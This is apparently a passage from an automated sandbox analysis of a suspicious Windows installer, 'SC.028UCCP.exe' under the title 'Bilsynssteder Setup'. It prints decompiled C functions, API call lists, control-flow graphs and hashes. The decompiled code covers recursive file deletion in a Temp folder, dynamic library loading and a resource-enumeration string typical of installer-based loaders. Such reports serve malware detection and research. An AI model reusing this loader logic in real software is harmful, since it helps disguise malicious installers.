                                  0x00405d3d
                                  0x00405d58
                                  0x00405d58
                                  0x00405d58
                                  0x00000000
                                  0x00405d58
                                  0x00405d43
                                  0x00405d4e
                                  0x00405d54
                                  0x00405d56
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00405d56
                                  0x00405d0f
                                  0x00405d12
                                  0x00000000
                                  0x00000000
                                  0x00405d21
                                  0x00405d23
                                  0x00405d25
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00405d25
                                  0x00000000
                                  0x00405d5b
                                  0x00405ce6
                                  0x00000000
                                  0x00405ca4
                                  0x00405ca9
                                  0x00405cbf
                                  0x00405cc4
                                  0x00405cc7
                                  0x00405d64
                                  0x00405d64
                                  0x00405d68
                                  0x00405d70
                                  0x00405d70
                                  0x00000000
                                  0x00405d68
                                  0x00405cd1
                                  0x00405d5f
                                  0x00405d5f
                                  0x00405d62
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00405d62
                                  0x00405ca2
                                  0x00405c75
                                  0x00405c79
                                  0x00000000
                                  0x00000000
                                  0x00405c7b
                                  0x00405c7f
                                  0x00000000
                                  0x00000000
                                  0x00405c81
                                  0x00405c85
                                  0x00000000
                                  0x00405c87
                                  0x00405c87
                                  0x00000000
                                  0x00405c87
                                  0x00405c85
                                  0x00405dea
                                  0x00405df4
                                  0x00405e00
                                  0x00405e00
                                  0x00000000

                                  APIs
                                  • GetVersion.KERNEL32(00000000,00429800,00000000,00404EDD,00429800,00000000), ref: 00405C6B
                                  • GetSystemDirectoryA.KERNEL32 ref: 00405CE6
                                  • GetWindowsDirectoryA.KERNEL32(Call,00000400), ref: 00405CF9
                                  • SHGetSpecialFolderLocation.SHELL32(?,0041B7D0), ref: 00405D35
                                  • SHGetPathFromIDListA.SHELL32(0041B7D0,Call), ref: 00405D43
                                  • CoTaskMemFree.OLE32(0041B7D0), ref: 00405D4E
                                  • lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00405D70
                                  • lstrlenA.KERNEL32(Call,00000000,00429800,00000000,00404EDD,00429800,00000000), ref: 00405DC2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                  • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$kernel32::EnumResourceTypesW(i 0,i r1,i 0)
                                  • API String ID: 900638850-3610614223
                                  • Opcode ID: 7ac0715764b03952955c741026f92e0c7695d25b47a09633014e38aa7c8f6962
                                  • Instruction ID: e530b436d7c2447f25c0a1e821fc153bec7607d44657ce307fe97dbee56ab49a
                                  • Opcode Fuzzy Hash: 7ac0715764b03952955c741026f92e0c7695d25b47a09633014e38aa7c8f6962
                                  • Instruction Fuzzy Hash: 9261E170A04A05ABEF205F658C88BBB7BA4EF15714F50813BE902BA2D1D27C5942DF4E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00405475 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 159filestringCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 537 405475-40549b call 405733 540 4054b4-4054bb 537->540 541 40549d-4054af DeleteFileA 537->541 543 4054bd-4054bf 540->543 544 4054ce-4054de call 405b98 540->544 542 40563e-405642 541->542 545 4054c5-4054c8 543->545 546 4055ec-4055f1 543->546 552 4054e0-4054eb lstrcatA 544->552 553 4054ed-4054ee call 40568c 544->553 545->544 545->546 546->542 548 4055f3-4055f6 546->548 550 405600-405608 call 405e9c 548->550 551 4055f8-4055fe 548->551 550->542 561 40560a-40561e call 405645 call 40542d 550->561 551->542 555 4054f3-4054f6 552->555 553->555 558 405501-405507 lstrcatA 555->558 559 4054f8-4054ff 555->559 560 40550c-40552a lstrlenA FindFirstFileA 558->560 559->558 559->560 562 405530-405547 call 405670 560->562 563 4055e2-4055e6 560->563 576 405620-405623 561->576 577 405636-405639 call 404ea5 561->577 570 405552-405555 562->570 571 405549-40554d 562->571 563->546 565 4055e8 563->565 565->546 574 405557-40555c 570->574 575 405568-405576 call 405b98 570->575 571->570 573 40554f 571->573 573->570 579 4055c1-4055d3 FindNextFileA 574->579 580 40555e-405560 574->580 588 405578-405580 575->588 589 40558d-405598 call 40542d 575->589 576->551 582 405625-405634 call 404ea5 call 405a4c 576->582 577->542 579->562 585 4055d9-4055dc FindClose 579->585 580->575 583 405562-405566 580->583 582->542 583->575 583->579 585->563 588->579 592 405582-40558b call 405475 588->592 597 4055b9-4055bc call 404ea5 589->597 598 40559a-40559d 589->598 592->579 597->579 599 4055b1-4055b7 598->599 600 40559f-4055af call 404ea5 call 405a4c 598->600 599->579 600->579
                                  C-Code - Quality: 98%
                                  			E00405475(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				void* _v12;
				signed int _v16;
				struct _WIN32_FIND_DATAA _v336;
				signed int _t40;
				char* _t53;
				signed int _t55;
				signed int _t58;
				signed int _t64;
				signed int _t66;
				void* _t68;
				signed char _t69;
				CHAR* _t71;
				CHAR* _t72;
				char* _t75;

				_t69 = _a8;
				_t72 = _a4;
				_v8 = _t69 & 0x00000004;
				_t40 = E00405733(__eflags, _t72);
				_v16 = _t40;
				if((_t69 & 0x00000008) != 0) {
					_t66 = DeleteFileA(_t72); // executed
					asm("sbb eax, eax");
					_t68 =  ~_t66 + 1;
					 *0x42ec28 =  *0x42ec28 + _t68;
					return _t68;
				}
				_a4 = _t69;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E00405B98(0x42b028, _t72);
					__eflags = _a4;
					if(_a4 == 0) {
						E0040568C(_t72);
					} else {
						lstrcatA(0x42b028, "\*.*");
					}
					__eflags =  *_t72;
					if( *_t72 != 0) {
						L10:
						lstrcatA(_t72, 0x409014);
						L11:
						_t71 =  &(_t72[lstrlenA(_t72)]); // executed
						_t40 = FindFirstFileA(0x42b028,  &_v336); // executed
						__eflags = _t40 - 0xffffffff;
						_v12 = _t40;
						if(_t40 == 0xffffffff) {
							L29:
							__eflags = _a4;
							if(_a4 != 0) {
								_t32 = _t71 - 1;
								 *_t32 =  *(_t71 - 1) & 0x00000000;
								__eflags =  *_t32;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t75 =  &(_v336.cFileName);
							_t53 = E00405670( &(_v336.cFileName), 0x3f);
							__eflags =  *_t53;
							if( *_t53 != 0) {
								__eflags = _v336.cAlternateFileName;
								if(_v336.cAlternateFileName != 0) {
									_t75 =  &(_v336.cAlternateFileName);
								}
							}
							__eflags =  *_t75 - 0x2e;
							if( *_t75 != 0x2e) {
								L19:
								E00405B98(_t71, _t75);
								__eflags = _v336.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t55 = E0040542D(__eflags, _t72, _v8);
									__eflags = _t55;
									if(_t55 != 0) {
										E00404EA5(0xfffffff2, _t72);
									} else {
										__eflags = _v8 - _t55;
										if(_v8 == _t55) {
											 *0x42ec28 =  *0x42ec28 + 1;
										} else {
											E00404EA5(0xfffffff1, _t72);
											E00405A4C(_t72, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405475(__eflags, _t72, _a8);
									}
								}
								goto L27;
							}
							_t64 =  *((intOrPtr*)(_t75 + 1));
							__eflags = _t64;
							if(_t64 == 0) {
								goto L27;
							}
							__eflags = _t64 - 0x2e;
							if(_t64 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t75 + 2));
							if( *((char*)(_t75 + 2)) == 0) {
								goto L27;
							}
							goto L19;
							L27:
							_t58 = FindNextFileA(_v12,  &_v336);
							__eflags = _t58;
						} while (_t58 != 0);
						_t40 = FindClose(_v12);
						goto L29;
					}
					__eflags =  *0x42b028 - 0x5c;
					if( *0x42b028 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t40;
					if(_t40 == 0) {
						L31:
						__eflags = _a4;
						if(_a4 == 0) {
							L39:
							return _t40;
						}
						__eflags = _v16;
						if(_v16 != 0) {
							_t40 = E00405E9C(_t72);
							__eflags = _t40;
							if(_t40 == 0) {
								goto L39;
							}
							E00405645(_t72);
							_t40 = E0040542D(__eflags, _t72, _v8 | 0x00000001);
							__eflags = _t40;
							if(_t40 != 0) {
								return E00404EA5(0xffffffe5, _t72);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L33;
							}
							E00404EA5(0xfffffff1, _t72);
							return E00405A4C(_t72, 0);
						}
						L33:
						 *0x42ec28 =  *0x42ec28 + 1;
						return _t40;
					}
					__eflags = _t69 & 0x00000002;
					if((_t69 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}


















                                  0x0040547f
                                  0x00405484
                                  0x0040548d
                                  0x00405490
                                  0x00405498
                                  0x0040549b
                                  0x0040549e
                                  0x004054a6
                                  0x004054a8
                                  0x004054a9
                                  0x00000000
                                  0x004054a9
                                  0x004054b4
                                  0x004054b7
                                  0x004054b7
                                  0x004054b7
                                  0x004054bb
                                  0x004054ce
                                  0x004054d5
                                  0x004054da
                                  0x004054de
                                  0x004054ee
                                  0x004054e0
                                  0x004054e6
                                  0x004054e6
                                  0x004054f3
                                  0x004054f6
                                  0x00405501
                                  0x00405507
                                  0x0040550c
                                  0x0040551c
                                  0x0040551e
                                  0x00405524
                                  0x00405527
                                  0x0040552a
                                  0x004055e2
                                  0x004055e2
                                  0x004055e6
                                  0x004055e8
                                  0x004055e8
                                  0x004055e8
                                  0x004055e8
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00405530
                                  0x00405530
                                  0x00405539
                                  0x0040553f
                                  0x00405544
                                  0x00405547
                                  0x00405549
                                  0x0040554d
                                  0x0040554f
                                  0x0040554f
                                  0x0040554d
                                  0x00405552
                                  0x00405555
                                  0x00405568
                                  0x0040556a
                                  0x0040556f
                                  0x00405576
                                  0x00405591
                                  0x00405596
                                  0x00405598
                                  0x004055bc
                                  0x0040559a
                                  0x0040559a
                                  0x0040559d
                                  0x004055b1
                                  0x0040559f
                                  0x004055a2
                                  0x004055aa
                                  0x004055aa
                                  0x0040559d
                                  0x00405578
                                  0x0040557e
                                  0x00405580
                                  0x00405586
                                  0x00405586
                                  0x00405580
                                  0x00000000
                                  0x00405576
                                  0x00405557
                                  0x0040555a
                                  0x0040555c
                                  0x00000000
                                  0x00000000
                                  0x0040555e
                                  0x00405560
                                  0x00000000
                                  0x00000000
                                  0x00405562
                                  0x00405566
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004055c1
                                  0x004055cb
                                  0x004055d1
                                  0x004055d1
                                  0x004055dc
                                  0x00000000
                                  0x004055dc
                                  0x004054f8
                                  0x004054ff
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004054bd
                                  0x004054bd
                                  0x004054bf
                                  0x004055ec
                                  0x004055ee
                                  0x004055f1
                                  0x00405642
                                  0x00405642
                                  0x00405642
                                  0x004055f3
                                  0x004055f6
                                  0x00405601
                                  0x00405606
                                  0x00405608
                                  0x00000000
                                  0x00000000
                                  0x0040560b
                                  0x00405617
                                  0x0040561c
                                  0x0040561e
                                  0x00000000
                                  0x00405639
                                  0x00405620
                                  0x00405623
                                  0x00000000
                                  0x00000000
                                  0x00405628
                                  0x00000000
                                  0x0040562f
                                  0x004055f8
                                  0x004055f8
                                  0x00000000
                                  0x004055f8
                                  0x004054c5
                                  0x004054c8
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004054c8

                                  APIs
                                  • DeleteFileA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,74D0FA90,00000000), ref: 0040549E
                                  • lstrcatA.KERNEL32(Resolver.Sel,\*.*,Resolver.Sel,?,?,C:\Users\user\AppData\Local\Temp\,74D0FA90,00000000), ref: 004054E6
                                  • lstrcatA.KERNEL32(?,00409014,?,Resolver.Sel,?,?,C:\Users\user\AppData\Local\Temp\,74D0FA90,00000000), ref: 00405507
                                  • lstrlenA.KERNEL32(?,?,00409014,?,Resolver.Sel,?,?,C:\Users\user\AppData\Local\Temp\,74D0FA90,00000000), ref: 0040550D
                                  • FindFirstFileA.KERNELBASE(Resolver.Sel,?,?,?,00409014,?,Resolver.Sel,?,?,C:\Users\user\AppData\Local\Temp\,74D0FA90,00000000), ref: 0040551E
                                  • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 004055CB
                                  • FindClose.KERNEL32(00000000), ref: 004055DC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                  • String ID: "C:\Users\user\Desktop\SC.028UCCP.exe"$C:\Users\user\AppData\Local\Temp\$Resolver.Sel$\*.*
                                  • API String ID: 2035342205-2573773740
                                  • Opcode ID: 6ff50277c47477ba13b9978e87605e00e69da3f94f5fa5e74a520864d0ac4353
                                  • Instruction ID: dbbc29da06062d166e219680d33f07273b6795458a0971578ca4c48f9a6f899a
                                  • Opcode Fuzzy Hash: 6ff50277c47477ba13b9978e87605e00e69da3f94f5fa5e74a520864d0ac4353
                                  • Instruction Fuzzy Hash: C051EE30800A04BADF22AB62CC45BAF7AB9DB42314F54417BF455711D2CB3C9A82DF6E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00405E9C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00405E9C(CHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileA(_a4, 0x42b870); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2); // executed
				return 0x42b870;
			}




                                  0x00405ea7
                                  0x00405eb0
                                  0x00000000
                                  0x00405ebd
                                  0x00405eb3
                                  0x00000000

                                  APIs
                                  • FindFirstFileA.KERNELBASE(?,0042B870,Resolver.Sel,00405776,Resolver.Sel,Resolver.Sel,00000000,Resolver.Sel,Resolver.Sel,?,?,74D0FA90,00405495,?,C:\Users\user\AppData\Local\Temp\,74D0FA90), ref: 00405EA7
                                  • FindClose.KERNELBASE(00000000), ref: 00405EB3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: Find$CloseFileFirst
                                  • String ID: Resolver.Sel
                                  • API String ID: 2295610775-3053244350
                                  • Opcode ID: 1aea5c224ac18c2ca6740f992a10f01b1202162fc1be4398f9fc9754ba096347
                                  • Instruction ID: 48e65e0373d101f51a2011d852bf3b0db847c0e77ea6d2d4d1a06a98fdfa31a0
                                  • Opcode Fuzzy Hash: 1aea5c224ac18c2ca6740f992a10f01b1202162fc1be4398f9fc9754ba096347
                                  • Instruction Fuzzy Hash: 2BD01235A0A4309BD3011738AD0C84B7A58DB053317108A33F8A9F13E0D3349D529AED
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00405EC3 Relevance: 4.5, APIs: 3, Instructions: 20libraryloaderCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00405EC3(signed int _a4) {
				struct HINSTANCE__* _t5;
				CHAR* _t7;
				signed int _t9;

				_t9 = _a4 << 3;
				_t7 =  *(_t9 + 0x409238);
				_t5 = GetModuleHandleA(_t7);
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t9 + 0x40923c));
				}
				_t5 = LoadLibraryA(_t7); // executed
				if(_t5 != 0) {
					goto L2;
				}
				return _t5;
			}






                                  0x00405ecb
                                  0x00405ece
                                  0x00405ed5
                                  0x00405edd
                                  0x00405eea
                                  0x00000000
                                  0x00405ef1
                                  0x00405ee0
                                  0x00405ee8
                                  0x00000000
                                  0x00000000
                                  0x00405ef9

                                  APIs
                                  • GetModuleHandleA.KERNEL32(?,?,?,00403150,00000008), ref: 00405ED5
                                  • LoadLibraryA.KERNELBASE(?,?,?,00403150,00000008), ref: 00405EE0
                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00405EF1
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: AddressHandleLibraryLoadModuleProc
                                  • String ID:
                                  • API String ID: 310444273-0
                                  • Opcode ID: 054130f1168f4888e0973aa3cf4ac603bfb450dfe6f2d22fd482d5db7ed26554
                                  • Instruction ID: dab59f0173490024aeed2266f34dc7cbbf7987d09f0ead05b8accc78f0831993
                                  • Opcode Fuzzy Hash: 054130f1168f4888e0973aa3cf4ac603bfb450dfe6f2d22fd482d5db7ed26554
                                  • Instruction Fuzzy Hash: ADE0C232A04511ABC720AB30ED0897B73ACEF88B41701497EF985F6151DB34AC11AFBB
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004039D5 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345windowstringCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 235 4039d5-4039e7 236 403b28-403b37 235->236 237 4039ed-4039f3 235->237 239 403b86-403b9b 236->239 240 403b39-403b74 GetDlgItem * 2 call 403ea8 KiUserCallbackDispatcher call 40140b 236->240 237->236 238 4039f9-403a02 237->238 241 403a04-403a11 SetWindowPos 238->241 242 403a17-403a1a 238->242 244 403bdb-403be0 call 403ef4 239->244 245 403b9d-403ba0 239->245 262 403b79-403b81 240->262 241->242 247 403a34-403a3a 242->247 248 403a1c-403a2e ShowWindow 242->248 253 403be5-403c00 244->253 250 403ba2-403bad call 401389 245->250 251 403bd3-403bd5 245->251 254 403a56-403a59 247->254 255 403a3c-403a51 DestroyWindow 247->255 248->247 250->251 266 403baf-403bce SendMessageA 250->266 251->244 252 403e75 251->252 260 403e77-403e7e 252->260 258 403c02-403c04 call 40140b 253->258 259 403c09-403c0f 253->259 263 403a5b-403a67 SetWindowLongA 254->263 264 403a6c-403a72 254->264 261 403e52-403e58 255->261 258->259 269 403e33-403e4c DestroyWindow EndDialog 259->269 270 403c15-403c20 259->270 261->252 267 403e5a-403e60 261->267 262->239 263->260 271 403b15-403b23 call 403f0f 264->271 272 403a78-403a89 GetDlgItem 264->272 266->260 267->252 274 403e62-403e6b ShowWindow 267->274 269->261 270->269 275 403c26-403c73 call 405bba call 403ea8 * 3 GetDlgItem 270->275 271->260 276 403aa8-403aab 272->276 277 403a8b-403aa2 SendMessageA IsWindowEnabled 272->277 274->252 305 403c75-403c7a 275->305 306 403c7d-403cb9 ShowWindow KiUserCallbackDispatcher call 403eca EnableWindow 275->306 278 403ab0-403ab3 276->278 279 403aad-403aae 276->279 277->252 277->276 283 403ac1-403ac6 278->283 284 403ab5-403abb 278->284 282 403ade-403ae3 call 403e81 279->282 282->271 286 403afc-403b0f SendMessageA 283->286 288 403ac8-403ace 283->288 284->286 287 403abd-403abf 284->287 286->271 287->282 291 403ad0-403ad6 call 40140b 288->291 292 403ae5-403aee call 40140b 288->292 303 403adc 291->303 292->271 301 403af0-403afa 292->301 301->303 303->282 305->306 309 403cbb-403cbc 306->309 310 403cbe 306->310 311 403cc0-403cee GetSystemMenu EnableMenuItem SendMessageA 309->311 310->311 312 403cf0-403d01 SendMessageA 311->312 313 403d03 311->313 314 403d09-403d42 call 403edd call 405b98 lstrlenA call 405bba SetWindowTextA call 401389 312->314 313->314 314->253 323 403d48-403d4a 314->323 323->253 324 403d50-403d54 323->324 325 403d73-403d87 DestroyWindow 324->325 326 403d56-403d5c 324->326 325->261 328 403d8d-403dba CreateDialogParamA 325->328 326->252 327 403d62-403d68 326->327 327->253 329 403d6e 327->329 328->261 330 403dc0-403e17 call 403ea8 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 328->330 329->252 330->252 335 403e19-403e31 ShowWindow call 403ef4 330->335 335->261
                                  C-Code - Quality: 84%
                                  			E004039D5(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				intOrPtr _t44;
				struct HWND__* _t49;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t115;
				signed int _t116;
				int _t117;
				signed int _t122;
				struct HWND__* _t125;
				struct HWND__* _t126;
				int _t127;
				long _t130;
				int _t132;
				int _t133;
				void* _t134;
				void* _t141;
				void* _t142;

				_t115 = _a8;
				if(_t115 == 0x110 || _t115 == 0x408) {
					_t35 = _a12;
					_t125 = _a4;
					__eflags = _t115 - 0x110;
					 *0x42a008 = _t35;
					if(_t115 == 0x110) {
						 *0x42eba8 = _t125;
						 *0x42a01c = GetDlgItem(_t125, 1);
						_t91 = GetDlgItem(_t125, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x428fe8 = _t91;
						E00403EA8(_t125);
						SetClassLongA(_t125, 0xfffffff2,  *0x42e388); // executed
						 *0x42e36c = E0040140B(4);
						_t35 = 1;
						__eflags = 1;
						 *0x42a008 = 1;
					}
					_t122 =  *0x4091d4; // 0x0
					_t133 = 0;
					_t130 = (_t122 << 6) +  *0x42ebc0;
					__eflags = _t122;
					if(_t122 < 0) {
						L34:
						E00403EF4(0x40b);
						while(1) {
							_t37 =  *0x42a008;
							 *0x4091d4 =  *0x4091d4 + _t37;
							_t130 = _t130 + (_t37 << 6);
							_t39 =  *0x4091d4; // 0x0
							__eflags = _t39 -  *0x42ebc4; // 0x4
							if(__eflags == 0) {
								E0040140B(1);
							}
							__eflags =  *0x42e36c - _t133; // 0x0
							if(__eflags != 0) {
								break;
							}
							_t44 =  *0x42ebc4; // 0x4
							__eflags =  *0x4091d4 - _t44; // 0x0
							if(__eflags >= 0) {
								break;
							}
							_t116 =  *(_t130 + 0x14);
							E00405BBA(_t116, _t125, _t130, 0x436800,  *((intOrPtr*)(_t130 + 0x24)));
							_push( *((intOrPtr*)(_t130 + 0x20)));
							_push(0xfffffc19);
							E00403EA8(_t125);
							_push( *((intOrPtr*)(_t130 + 0x1c)));
							_push(0xfffffc1b);
							E00403EA8(_t125);
							_push( *((intOrPtr*)(_t130 + 0x28)));
							_push(0xfffffc1a);
							E00403EA8(_t125);
							_t49 = GetDlgItem(_t125, 3);
							__eflags =  *0x42ec2c - _t133; // 0x0
							_v32 = _t49;
							if(__eflags != 0) {
								_t116 = _t116 & 0x0000fefd | 0x00000004;
								__eflags = _t116;
							}
							ShowWindow(_t49, _t116 & 0x00000008); // executed
							EnableWindow( *(_t134 + 0x30), _t116 & 0x00000100); // executed
							E00403ECA(_t116 & 0x00000002);
							_t117 = _t116 & 0x00000004;
							EnableWindow( *0x428fe8, _t117);
							__eflags = _t117 - _t133;
							if(_t117 == _t133) {
								_push(1);
							} else {
								_push(_t133);
							}
							EnableMenuItem(GetSystemMenu(_t125, _t133), 0xf060, ??);
							SendMessageA( *(_t134 + 0x38), 0xf4, _t133, 1);
							__eflags =  *0x42ec2c - _t133; // 0x0
							if(__eflags == 0) {
								_push( *0x42a01c);
							} else {
								SendMessageA(_t125, 0x401, 2, _t133);
								_push( *0x428fe8);
							}
							E00403EDD();
							E00405B98(0x42a020, "Bilsynssteder Setup");
							E00405BBA(0x42a020, _t125, _t130,  &(0x42a020[lstrlenA(0x42a020)]),  *((intOrPtr*)(_t130 + 0x18)));
							SetWindowTextA(_t125, 0x42a020); // executed
							_push(_t133);
							_t67 = E00401389( *((intOrPtr*)(_t130 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t130 - _t133;
								if( *_t130 == _t133) {
									continue;
								}
								__eflags =  *(_t130 + 4) - 5;
								if( *(_t130 + 4) != 5) {
									DestroyWindow( *0x42e378); // executed
									 *0x4297f8 = _t130;
									__eflags =  *_t130 - _t133;
									if( *_t130 <= _t133) {
										goto L58;
									}
									_t73 = CreateDialogParamA( *0x42eba0,  *_t130 +  *0x42e380 & 0x0000ffff, _t125,  *(0x4091d8 +  *(_t130 + 4) * 4), _t130); // executed
									__eflags = _t73 - _t133;
									 *0x42e378 = _t73;
									if(_t73 == _t133) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t130 + 0x2c)));
									_push(6);
									E00403EA8(_t73);
									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t134 + 0x10);
									ScreenToClient(_t125, _t134 + 0x10);
									SetWindowPos( *0x42e378, _t133,  *(_t134 + 0x20),  *(_t134 + 0x20), _t133, _t133, 0x15);
									_push(_t133);
									E00401389( *((intOrPtr*)(_t130 + 0xc)));
									__eflags =  *0x42e36c - _t133; // 0x0
									if(__eflags != 0) {
										goto L61;
									}
									ShowWindow( *0x42e378, 8);
									E00403EF4(0x405);
									goto L58;
								}
								__eflags =  *0x42ec2c - _t133; // 0x0
								if(__eflags != 0) {
									goto L61;
								}
								__eflags =  *0x42ec20 - _t133; // 0x0
								if(__eflags != 0) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x42e378);
						 *0x42eba8 = _t133;
						EndDialog(_t125,  *0x4293f0);
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t130 - _t133;
							if( *_t130 == _t133) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t130 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L33;
						}
						SendMessageA( *0x42e378, 0x40f, 0, 1);
						__eflags =  *0x42e36c - _t133; // 0x0
						return 0 | __eflags == 0x00000000;
					}
				} else {
					_t125 = _a4;
					_t133 = 0;
					if(_t115 == 0x47) {
						SetWindowPos( *0x42a000, _t125, 0, 0, 0, 0, 0x13);
					}
					if(_t115 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x42a000,  ~(_a12 - 1) & _t115);
					}
